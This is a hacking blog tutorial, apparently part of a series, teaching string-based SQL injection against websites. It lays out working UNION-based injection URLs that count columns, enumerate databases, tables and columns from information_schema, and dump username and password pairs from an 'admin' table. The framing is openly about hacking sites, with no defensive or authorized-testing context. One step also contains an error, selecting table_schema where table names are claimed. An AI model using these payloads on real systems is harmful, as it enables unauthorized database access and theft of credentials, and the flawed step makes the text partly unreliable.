SQL Injection STEP 5 : String Based Injection

by 10:26 0 comments
Alright, since my previous tutorials haven't had enough responses as I expected due to people who aren't fond of reading big tutorials, I've decided I won't make this tutorial big. As a matter of fact, I'll just make you understand the concepts behind String Based SQL injection. I KNOW there are a lot of tutorials that would be the same as this one, but I guarantee that if you read this, you won't have any doubts on String Based.
[showads ad=1]
What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Please refer to my previous tutorials to know more about Error Based and Union Based

Tejen Dave

Developer

I'm a hacker, but I'm the good kind of hackers. And I've never been a criminal.

0 comments:

Post a Comment